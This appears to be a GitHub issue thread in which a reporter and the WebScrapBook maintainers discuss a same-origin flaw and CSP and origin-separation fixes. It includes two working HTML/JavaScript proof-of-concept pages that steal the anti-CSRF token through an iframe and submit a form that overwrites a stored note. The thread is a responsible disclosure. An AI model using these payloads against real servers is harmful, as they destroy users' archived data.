Extension and browser must use distinct "Origin" #16
I agree that using the same origin for the backend API and for serving captured pages can open a security hole as you described, although it may not be too common, as it requires an intentionally XSS-ing site and the user capturing such a page without purging scripts, which is the default WSB capture setting. However, serving multiple ports/hosts from the backend would significantly increase the difficulty of setup for the user, and it would also require a large code rework. Furthermore, PyWebScrapBook also provides a web interface itself, which can be accessed by visiting a served directory.

Before we've come up with a full solution, for now I think we can take advantage of the connect-src content security policy, which restricts what the browser may connect to via scripts. We can add a connect-src restriction to the headers of the pages the backend serves.
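A minimal sketch of the idea, assuming a generic WSGI setup (this is not PyWebScrapBook's actual code, and the policy value is only illustrative):

# Hypothetical sketch: a WSGI middleware that attaches a Content-Security-Policy
# header with a connect-src restriction to every response the backend serves.
def add_csp(app, policy="connect-src 'none';"):
    def wrapped(environ, start_response):
        def start_response_csp(status, headers, exc_info=None):
            headers = list(headers) + [("Content-Security-Policy", policy)]
            return start_response(status, headers, exc_info)
        return app(environ, start_response_csp)
    return wrapped

With connect-src 'none' in place, the browser refuses fetch/XHR/WebSocket calls issued by scripts inside captured pages.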
I do not think it is really hard for users to add another optional (but highly recommended) section to the config with another host and port. By default the view and manage interfaces could share the same origin. There is no problem with starting another thread with an additional WSGI server in the code. During extension setup it is better to allow the user to specify either address and to fetch the counterpart using a dedicated API method. The administrative part of the web interface may share an origin with the address used for API requests from the extension, but it should not be the same as the origin used to view saved pages. In the backend code, a series of …
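A rough sketch of what running a second, view-only server next to the API server could look like, assuming plain wsgiref and hypothetical view_app / api_app applications (not PyWebScrapBook's actual structure):

# Hypothetical sketch: serve the view-only interface and the management/API
# interface on two different ports so that they have distinct origins.
import threading
from wsgiref.simple_server import make_server

def run_two_origins(view_app, api_app, host="127.0.0.1"):
    # Captured pages are browsed through this origin ...
    view_server = make_server(host, 8080, view_app)
    threading.Thread(target=view_server.serve_forever, daemon=True).start()
    # ... while the extension talks to the API on a different origin.
    make_server(host, 8081, api_app).serve_forever()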
What do you think about the CSP approach mentioned above? A quick test shows it can indeed help block AJAX requests from captured pages. If there's no significant flaw we may implement it for now. As for a full redesign with separated view/administration, it is not a small amount of work and may have to wait until we've got time.
Sorry for the delay. I realized that I have no solid picture of how to use your idea with … Actually a restrictive … After reading the "Cross-Site Request Forgery Prevention Cheat Sheet", let's obtain a token using an iframe and perform an action by submitting a form.

<!DOCTYPE html>
<html data-scrapbook-type="note">
<head>
<meta charset="UTF-8">
<meta http-equiv="Content-Security-Policy" content="connect-src 'none';">
<title data-scrapbook-elem="title">WSB frame hack</title>
</head>
<body>
<h1>WebScrapBook iframe hack</h1>
<iframe src="/?a=token&f=json"></iframe>
<div>
<form id="form" action='/data/20200825072842466/index.md?a=save&f=json' method="POST">
<label>Token <input name="token" id="token"></label>
<label>Replacement text <input name="text" value="Hacked using form"></label>
<button type="submit" id="submitit">Hack it!</button>
</form>
</div>
<div>
<pre id="log"></pre>
</div>
<script type="text/javascript">
const hackTarget = '/data/20200825072842466/index.md';
var log = document.getElementById("log");
var tokenInput = document.getElementById("token");
var form = document.getElementById("form");
function logError(e) {
console.error(e);
log.innerText += "\nError:\n" + e + "\n";
}
async function hackIt() {
// The token iframe is same-origin, so its JSON body (containing the anti-CSRF token) is readable.
const token = JSON.parse(window.frames[0].document.body.innerText).data;
tokenInput.value = token;
// connect-src does not cover form submission, so the save action still goes through.
form.submit();
}
// Give the token iframe time to load before reading it.
setTimeout(() => hackIt().catch(logError), 1000);
</script>
</body>
</html>
Good point. Can we prevent this by restricting the token action to POST only?
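For illustration only, a check along these lines could refuse non-POST requests for the token action (parameter names follow the URLs in the example above; this is not the actual PyWebScrapBook handler):

# Hypothetical sketch: refuse to hand out the anti-CSRF token on anything but POST.
from urllib.parse import parse_qs

def token_guard(environ, start_response):
    query = parse_qs(environ.get("QUERY_STRING", ""))
    if query.get("a") == ["token"] and environ["REQUEST_METHOD"] != "POST":
        start_response("405 Method Not Allowed", [("Content-Type", "text/plain")])
        return [b"token requires POST\n"]
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"...normal request handling...\n"]

As the next comment demonstrates, a form inside an iframe can still issue the POST, so this check alone would not close the hole.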
You are approaching the limit of my creativity, though I am not a pentester and do not have a ready-to-use cookbook or automated tools. The single-origin approach is fragile: next time I could miss a way to overcome a suggested protection, and it will be even harder to maintain the achieved level of security during unavoidable code modifications. The token can still be obtained with the POST method using a form inside an iframe. Certainly, scripts could be completely disabled on the captured pages, and that would work for a significant share of pages; however, it would break pages with self-contained JavaScript that requires no external resources.

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Security-Policy" content="connect-src 'none';">
<meta charset="UTF-8">
<title>WebScrapBook double form hack</title>
</head>
<body>
<h1>WebScrapBook double form hack</h1>
<div>
<iframe src="index.html"></iframe>
</div>
<div>
<form id="tokenForm" action="/?a=token&f=json" method="POST">
Form to fetch token
</form>
</div>
<div>
<form id="overwriteForm" action='/data/20200825072842466/index.md?a=save&f=json' method="POST">
<label>Token <input name="token" id="token"></label>
<label>Replacement text <input name="text" value="Hacked using double form"></label>
<button type="submit" id="submitit">Hack it!</button>
</form>
</div>
<div>
<pre id="log"></pre>
</div>
<script type="text/javascript">
const hackTarget = '/data/20200825072842466/index.md';
var log = document.getElementById("log");
var tokenInput = document.getElementById("token");
var overwriteForm = document.getElementById("overwriteForm");
var tokenForm = document.getElementById("tokenForm");
function logError(e) {
console.error(e);
log.innerText += "\nError:\n" + e + "\n";
}
async function hackIt() {
// Read the anti-CSRF token from the JSON response loaded into the iframe by the nested copy of this page.
const token = JSON.parse(window.frames[0].document.body.innerText).data;
tokenInput.value = token;
overwriteForm.submit();
}
if (window.parent == window) {
// Top-level copy: wait for the framed copy to fetch the token, then overwrite the target.
setTimeout(() => hackIt().catch(logError), 1000);
} else {
// Framed copy: POST the token form so the iframe ends up containing the token JSON.
tokenForm.submit();
}
</script>
</body>
</html>
There is …
Obviously I was wrong with …, since …
If the user can't guard himself against capturing a page with malicious scripts, there's not much we can do. Even if viewing and administration are separated by origin, a malicious script in the database can still do many bad things, such as mining, generating phishing or CSRF links, auto-downloading malware, or scanning the whole scrapbook and stealing everything to a remote server. In this respect, CSP may provide more protection than separating origins, by disallowing connections.

I think form action is something that should be forbidden or at least limited: the intention of capturing a page containing a form is more likely to get a static reference rather than a working form, which could lose its original context and be dangerous if accidentally submitted, especially if the server of the source page doesn't guard against such CSRF-like behavior.

Still another leak is that a malicious script can send offending requests by framing a privileged page and controlling it. We probably need to apply CSP to the whole scrapbook site and exempt the privileged scripts by inlining them and using the sha-* source directive. This seems somewhat ugly but is the only way I can think of currently.

Another thing is to restrict framing so that a malicious script can't happily scan the whole site and send data to an external server by framing. This doesn't seem easy, as we don't want to block framing of normally captured web pages, which can contain frames from the same or different origins.
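For the sha-* exemption mentioned above, the hash source is just the base64-encoded SHA-256 of the inline script text; a small sketch (the script content is only a placeholder):

# Compute a CSP hash source that whitelists one specific inline script.
import base64
import hashlib

def csp_sha256(inline_script: str) -> str:
    digest = hashlib.sha256(inline_script.encode("utf-8")).digest()
    return "'sha256-" + base64.b64encode(digest).decode("ascii") + "'"

# Example policy fragment for a privileged viewer script (placeholder content):
print("script-src " + csp_sha256("initViewer();"))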
That is exactly the reason why I am asking for separated origins. I want to delegate CSP management to uMatrix, which offers a decent user interface for granular permissions, or to NoScript, which is simpler. If it were possible to serve different pages from distinct subdomains, it would be easy to set a restrictive default policy and to enable scripts for particular pages.
I don't think requiring an external browser extension is a solution. Additionally, if uMatrix can easily restrict scripts for particular pages, can't it do so when the origin is not separated? Further investigation shows that …
This should be able to block all undesired requests from a potentially malicious script, with the side effect that AJAX and forms are not allowed for captured scripted pages. Can you check if there's still a possible leak? Additionally, we may add an …
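The concrete directives were elided from the comment as captured here. Purely as an assumption, a policy along the lines discussed in this thread (blocking script connections and form submissions on served pages) might be assembled like this:

# Assumed, illustrative policy only -- not necessarily the one referenced above.
CSP_POLICY = "; ".join([
    "connect-src 'none'",  # no fetch/XHR/WebSocket from captured pages
    "form-action 'none'",  # no form submissions from captured pages
])
HEADERS = [("Content-Security-Policy", CSP_POLICY)]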
Unfortunately it seems impossible to define a path-specific CSP in uMatrix (at least I could not figure out how to do it, and there is gorhill/uMatrix#734), so a convenient interface exists only at per-domain granularity. Even just separating the scrapbook management interface from the captured content makes the protection more reliable; I consider a subdomain per captured page an extreme case. I do not think that relying on other extensions to some extent is bad. In my opinion it is better to concentrate on accuracy of capture and convenience of collection management, of course having security in mind. I was disappointed that Firefox does not support …

As to forms, besides submitting user data, I have seen an interface to a site archive implemented as a form allowing selection of an interesting period. Sorry, I do not remember the link. I have not got an idea how to bypass …
Well, it's not really right to rely on a third-party tool for basic security. We should implement a basic security guard by default, possibly with options to turn it off if it conflicts with other tools that have enhanced features.
CSP only blocks the request issued by a form action. If the interface is implemented with JavaScript that listens for the form's submit event and does its own handling, it will not be affected by CSP. OTOH, a …
That's good. We will probably go for this, at least for now.
Implemented CSP in 0.20.0
Sorry for the late response. I have checked that my 3 examples no longer work with the PyWebScrapBook 0.21.1 backend. Thank you for the CSP fix. If you do not mind, I would keep this issue open for a while, but I am not expecting particular actions from you currently. I hope to look into the relevant parts of the code more closely to get some impression of how the API and view endpoints could be separated.
I am considering the following to be a quite serious security flaw. The least important consequence is self-destructing captures, but I am afraid of damage to the whole archive.
My opinion is that the extension (capture and edit) and browser (view content) contexts should be strictly separated. Ordinary browser windows should have credentials allowing only viewing of saved pages. Saving new pages or editing them should be available from extension code only.
A fully configured backend should use different domains for the API and for saved content. In a quick/developer setup it could at least use different ports on localhost. Personally, I am considering dnsmasq and a separate subdomain for each saved page.
Prerequisite: a JS script has somehow leaked from the original page into the capture. It is hard to ensure that all scripts are cleaned even when the related option is set.
Let's assume that there is a note
/data/20200825072842466/index.md
on the server. In real life the URL could be obtained from the directory index. I have put the following file into another directory, simulating a leak of JavaScript into a saved file:
I have clicked on this page in the WebScrapBook sidebar and got another page overwritten.
I believe that a separate WSGI application without support for modifying actions is required to serve saved pages for viewing. In the case of a "production" setup with a reverse proxy, the application's role shrinks to checking authentication and rendering Markdown notes; static files could be served by the reverse proxy directly. A different origin (host or port) is necessary to prevent cross-origin (CSRF-like) attacks.
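A minimal sketch of such a view-only application, assuming a hypothetical SCRAPBOOK_ROOT directory (the real PyWebScrapBook application is organized differently):

# Hypothetical sketch: a separate WSGI app that can only read captured files.
import mimetypes
import os
from wsgiref.util import FileWrapper

SCRAPBOOK_ROOT = "/path/to/scrapbook"  # placeholder location

def view_only_app(environ, start_response):
    if environ["REQUEST_METHOD"] != "GET":
        start_response("405 Method Not Allowed", [("Content-Type", "text/plain")])
        return [b"read-only interface\n"]
    # Resolve the request and refuse anything outside the scrapbook root.
    requested = environ.get("PATH_INFO", "/").lstrip("/")
    path = os.path.normpath(os.path.join(SCRAPBOOK_ROOT, requested))
    if not path.startswith(SCRAPBOOK_ROOT + os.sep) or not os.path.isfile(path):
        start_response("404 Not Found", [("Content-Type", "text/plain")])
        return [b"not found\n"]
    content_type = mimetypes.guess_type(path)[0] or "application/octet-stream"
    start_response("200 OK", [
        ("Content-Type", content_type),
        ("Content-Security-Policy", "connect-src 'none'; form-action 'none'"),
    ])
    return FileWrapper(open(path, "rb"))

Authentication checks and Markdown rendering could be layered on top of this; the modifying actions simply do not exist in this application.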